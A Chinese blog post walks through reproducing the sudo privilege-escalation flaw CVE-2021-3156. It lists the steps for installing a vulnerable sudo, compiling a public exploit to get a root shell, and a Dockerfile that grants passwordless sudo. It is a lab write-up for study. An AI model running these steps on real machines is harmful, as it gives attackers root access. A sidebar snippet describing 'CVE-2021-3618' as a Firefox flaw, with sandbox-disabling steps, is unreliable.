CVE-2021-3156 漏洞复现

最新推荐文章于 2024-07-04 08:17:47 发布
最新推荐文章于 2024-07-04 08:17:47 发布
阅读量4.1k 收藏 16
点赞数
文章标签: CVE-2021-3156 漏洞复现 sudo dockerfile linux
Wuuconix wanna a girlfriend!
本文链接:https://blog.csdn.net/Cypher_X/article/details/116749585
版权

CVE-2021-3156 漏洞复现

漏洞描述

这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2),并且sudo支持的其他操作系统和Linux发行版也很容易受到攻击。

环境准备

  • Ubuntu 20.04.2 LTS

  • sudo=1.8.31-1ubuntu1

  • 这里要注意sudo的版本必须为1.8.31-1ubuntu1。1.8.31-1ubuntu1.2版本的sudo貌似已经修复了这个漏洞。

  • 我们可以使用以下命令获得软件的不同版本

    apt-cache madison sudo

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jnsVcNnQ-1620887938178)(CVE-2021-3156 漏洞复现.assets/apt-cache.png)]

  • 然后我们可以通过在软件后面加上=版本号来安装指定的版本。

    sudo apt install sudo=1.8.31-1ubuntu1

漏洞复现

  • 在准备好测试环境后,漏洞复现会变得非常简单。

  • 我们先输入

    sudoedit -s /

  • 来看看是否存在该漏洞

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pHXUCqwg-1620887938180)(CVE-2021-3156 漏洞复现.assets/sudoedit-1620886242979.png)]

  • 如果报错的错误是以sudoedit开头的,那么恭喜你的机器可能收到了该漏洞的影响,如果你返回的错误是以usage:开头的,那么你也许得换种环境来复现。

  • 然后我们需要从blasty/CVE-2021-3156 (github.com)上克隆exp

     git clone https://github.com/blasty/CVE-2021-3156.git

  • 然后我们进入文件夹执行make指令进行编译

    cd CVE-2021-3156.git
make

  • 当然这需要你之前安装过make,同时make时会调用gcc,如果你都没有得话需要提前安装。

    sudo apt install -y make gcc

  • 然后我们执行文件就可以成功得到root shell

    ./sudo-hax-me-a-sandwich 0

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3pGWil1e-1620887938181)(CVE-2021-3156 漏洞复现.assets/root.png)]

尚存的疑惑

当我试图在docker镜像中复现此漏洞时出现了问题。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5T0x9uGH-1620887938182)(CVE-2021-3156 漏洞复现.assets/docker错误.png)]

以下是我的dockerfile

FROM ubuntu:20.04

LABEL Author="wuuconix <wuuconix@gmail.com>"
LABEL Blog="https://blog.csdn.net/Cypher_X"

COPY ./files /tmp/
RUN \cp -rf /tmp/sources.list /etc/apt/sources.list \
  && apt-get update \
  && apt install -y sudo=1.8.31-1ubuntu1\
  && apt install -y make \
  && apt install -y gcc \
  && apt install -y vim \
  && apt install -y git \
  && useradd -ms /bin/bash -G sudo wuuconix \
  && echo '%sudo ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers \
  && echo "wuuconix:1234" | chpasswd \
  && chown -R wuuconix:wuuconix /home/wuuconix/ 

USER wuuconix
WORKDIR /home/wuuconix

RUN cd /home/wuuconix/ \
  && git clone https://github.com/blasty/CVE-2021-3156.git \
  && cd CVE-2021-3156 \
  && make

如果有大佬看见,可以帮我看看哪里出错了。以下是源码和docker image

wuuconix/CVE-2021-3156-Dockerfile-not-succeed(github.com)

Docker Hub wuuconix/cve-2021-3156-not-succeed

参考链接

CVE-2021-3156 漏洞复现 附带 提权exp - 誉津 - 博客园 (cnblogs.com)

Wuuconix
关注
  • 0
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2021-3156漏洞复现
qq_52107280的博客
07-20 1046
CVE-2021-3156 Linux sudo权限提升漏洞 复现 漏洞描述 1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权
CVE-2021-3156Linux sudo权限提升漏洞漏洞复现
markecheng的博客
02-02 1283
一、漏洞简介 1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。 二、影响版本 Sudo 1
通过升级nginx完美修复nginx相关漏洞
最新发布
cooldream2009的博客
07-04 1186
在软件开发完成并交付给客户后,经过一段时间,客户的上级部门要求对服务器进行安全检测。通过漏洞扫描,发现了服务器存在安全漏洞,并要求在规定期限内完成漏洞修补。由于客户通常缺乏技术能力,他们会求助于软件开发公司来协助解决服务器的安全问题。作为软件开发人员,我们不仅会为客户开发软件,还会帮助他们解决服务器安全方面的难题,确保其系统的安全性和稳定性。
CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
IronmanJay的博客
06-01 2711
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
CVE-2021-3156复现
weixin_43781139的博客
03-04 712
0x00 前言 几天前爆出了一个高危sudo提权洞,这我立马就来劲了,赶紧过来复现一波涨涨知识。 0x01 漏洞详情 Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。 当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以ro...
Linux sudo权限提升漏洞复现CVE-2021-3156
热门推荐
02-02 2万+
2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限。据报道这个漏洞已存在十年了,大...
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
CVE-2021-3156
03-05
CVE-2021-3156 PoC 介绍 这是CVE-2021-3156 sudo漏洞(由Qualys称为的漏洞)的利用程序。 用法 建造: $ make 列出目标: $ ./sudo-hax-me-a-sandwich 跑: $ ./sudo-hax-me-a-sandwich <target> 手动模式: $ ./sudo-hax-me-a-sandwich <smash> <smash> <null> <lc> 蛮力目标发现(实验性) 确保已安装。 $ make brute $ ./brute.sh <smash> <smash> <null> <null> <lc> <lc> 一些默认尝试: $ ./brute.sh 90 120 50
CVE-2021-3156:CVE-2021-3156
03-06
CVE-2021-3156
Linux sudo权限提升漏洞CVE-2021-3156 复现
Ms08067安全实验室
02-02 321
出品|MS08067实验室(www.ms08067.com)本文作者:大方子(Ms08067实验室核心成员)大方子微信(欢迎骚扰交流):漏洞概述1月26日,Sudo发布安全通告,修复了一...
Linux sudo权限提升漏洞 CVE-2021-3156
PeiQi的博客
01-31 789
Linux sudo权限提升漏洞 CVE-2021-3156 漏洞描述 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在su
Sudo堆溢出漏洞(CVE-2021-3156)复现
蚁景网安学院
06-28 1082
2021 年 1 月 26 日,Qualys Research Labs在 sudo 发现了一个缺陷。sudo 解析命令行参数的方式时,错误的判断了截断符,从而导致攻击者可以恶意构造载荷,使得sudo发生堆溢出,该漏洞在配合环境变量等分配堆以及释放堆的原语下,可以致使本地提权。
复现--Linux sudo权限提升漏洞(CVE-2021-3156)
打工人日记
01-31 2143
前言 网上已经有了很多的相关复现文章,但是还是有一些疑问,比如: 普通用户如果有sudo权限的话,已经可以执行root用户能执行的命令,再去提权好像意义不大 环境准备 华为云VPS(Ubuntu 18.04.4 LTS、Sudo version 1.8.21p2) 创建新用户test-1(无sudo权限) 下载大佬的EXP(没办法,自己太菜了) 开始提权 test-1@dreamer:/home$ cd test-1/ test-1@dreamer:~$ ls CVE-2021-3156
CVE-2021-3156 Sudo漏洞复现
m0_56642842的博客
05-31 265
测试环境 该漏洞最开始给出的exp是针对Ubuntu18和20版本以及Debian10版本的,于是我们直接在Debian系的kali(19版本)上测一下。 复现所用到的sudo版本。 Sudo 版本 1.8.31p1 Sudoers 策略插件版本 1.8.31p1 Sudoers 文件语法版本 46 Sudoers I/O plugin version 1.8.31p1 测试准备 首先下载gayhub上的exp套餐(https://github.com/blasty/CVE-2021-3156) 看一下套
cve-2021-3618漏洞复现
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出现异常行为,可能是因为已经修复了该漏洞或在你的环境中无法成功利用。 需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受相关风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值